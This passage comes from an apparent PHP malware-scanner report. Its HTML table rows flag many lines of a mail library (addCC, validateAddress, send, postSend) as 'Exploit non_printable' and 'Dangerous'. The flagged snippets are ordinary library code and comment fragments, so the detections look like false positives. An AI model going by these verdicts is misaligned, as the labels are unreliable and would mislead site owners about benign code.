<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'to'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1065</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">works with the SMTP mailer on win32</span><span style="color: #007700">, </span><span style="color: #0000BB">not with the </span><span style="color: #DD0000">"mail" </span><span style="color: #0000BB">mailer</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1070</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'cc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1082</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addBCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1084</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'bcc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1093</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addReplyTo</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1095</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'Reply-To'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1101</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function), </span><span style="color: #0000BB">addition of such addresses is delayed until send</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1102</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">but </span><span style="color: #007700">do </span><span style="color: #0000BB">not </span><span style="color: #007700">throw </span><span style="color: #0000BB">exceptions</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1110</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func_array</span><span style="color: #007700">(array(</span><span style="color: #0000BB">$this</span><span style="color: #007700">, </span><span style="color: #DD0000">'addAnAddress'</span><span style="color: #007700">), </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1192</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">the IMAP extension is available</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1196</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parseAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$addrstr</span><span style="color: #007700">, </span><span style="color: #0000BB">$useimap </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'imap_rfc822_parse_adrlist'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1241</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1249</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$isHtml </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1286</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setFrom</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$auto </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1313</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the Message</span><span style="color: #007700">-</span><span style="color: #0000BB">ID header of the last email</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getLastMessageID</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1321</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">lastMessageID</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1336</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #DD0000">'@'</span><span style="color: #007700">) !== </span><span style="color: #0000BB">false</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1343</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">validateAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$patternselect </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$patternselect</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1365</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'extension_loaded'</span><span style="color: #007700">) and </span><span style="color: #0000BB">extension_loaded</span><span style="color: #007700">(</span><span style="color: #DD0000">'pcre'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1385</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1425</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) >= </span><span style="color: #0000BB">3</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1430</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">filter_var</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">FILTER_VALIDATE_EMAIL</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1437</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool </span><span style="color: #DD0000">"true" </span><span style="color: #007700">if </span><span style="color: #0000BB">required functions </span><span style="color: #007700">for </span><span style="color: #0000BB">IDN support are present</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1439</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">idnSupported</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">PHP </span><span style="color: #007700"><= </span><span style="color: #0000BB">5.2</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1442</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'idn_to_ascii'</span><span style="color: #007700">) and </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_convert_encoding'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1448</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">silently returns unmodified address </span><span style="color: #007700">if:</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1450</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions are not available</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1454</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The encoded address in ASCII form</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">punyencodeAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">, </span><span style="color: #0000BB">CharSet</span><span style="color: #007700">, and </span><span style="color: #0000BB">at</span><span style="color: #007700">-</span><span style="color: #0000BB">sign</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">) . </span><span style="color: #0000BB">$punycode</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1473</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$address</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1480</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean false on error </span><span style="color: #007700">- </span><span style="color: #0000BB">See the ErrorInfo property </span><span style="color: #007700">for </span><span style="color: #0000BB">details of the error</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1482</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">send</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1488</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">postSend</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1504</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">preSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1604</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">postSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1611</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1613</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1615</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1619</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">$sendMethod</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1643</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
